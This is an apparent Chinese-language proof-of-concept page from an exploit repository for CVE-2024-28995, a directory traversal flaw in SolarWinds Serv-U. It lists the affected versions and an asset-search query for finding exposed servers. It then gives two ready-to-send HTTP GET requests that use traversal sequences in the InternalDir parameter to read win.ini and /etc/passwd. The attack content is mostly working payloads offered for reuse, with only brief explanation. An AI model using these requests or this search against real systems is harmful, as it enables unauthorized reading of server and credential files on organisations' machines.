POC/wpoc/SolarWinds/SolarWindsServ-U存在目录遍历漏洞(CVE-2024-28995).md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

46 lines
1.9 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# SolarWinds Serv-U存在目录遍历漏洞(CVE-2024-28995)
# 一、漏洞简介
SolarWinds的产品主要面向中小型企业和大型企业的IT部门提供网络监控、系统管理、数据库管理、安全管理等解决方案2024年6月Serv-U 官方 SolarWinds 发布了新补丁,修复了一处目录 遍历Q 致文件读取漏洞(CVE-2024-28995)。Serv-U 的目录遍历漏洞(CVE-2024-28995)是由于在处理路径时缺乏适当的验证。攻击者可以通过传递包含"../"的路径段绕过路径验证,访问任意文件。
# 二、影响版本
SolarWinds Serv-U FTP Server <= 15.4.2 Hotfix 1
SolarWinds Serv-U Gateway <= 15.4.2 Hotfix 1
SolarWinds Serv-U MFT Server <= 15.4.2 Hotfix 1
# 三、资产测绘
```plain
server="Serv-U"
```
![1718816792242-9264a1a9-21a1-46b7-883c-05bdc2ebd941.png](./img/rz4V_zywIK0VMDWz/1718816792242-9264a1a9-21a1-46b7-883c-05bdc2ebd941-121329.png)
# 四、漏洞复现
```java
GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```
![1718816940899-dad0cdd4-ca21-4852-a979-1ccb1047686a.png](./img/rz4V_zywIK0VMDWz/1718816940899-dad0cdd4-ca21-4852-a979-1ccb1047686a-277040.png)
```java
GET /?InternalDir=\..\..\..\..\etc&InternalFile=passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
```
![1718817173765-53cef411-e387-4a5c-bac9-2b22ffc05443.png](./img/rz4V_zywIK0VMDWz/1718817173765-53cef411-e387-4a5c-bac9-2b22ffc05443-721181.png)
> 更新: 2024-06-23 23:42:48
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vt3h2cvl0d3cb5do>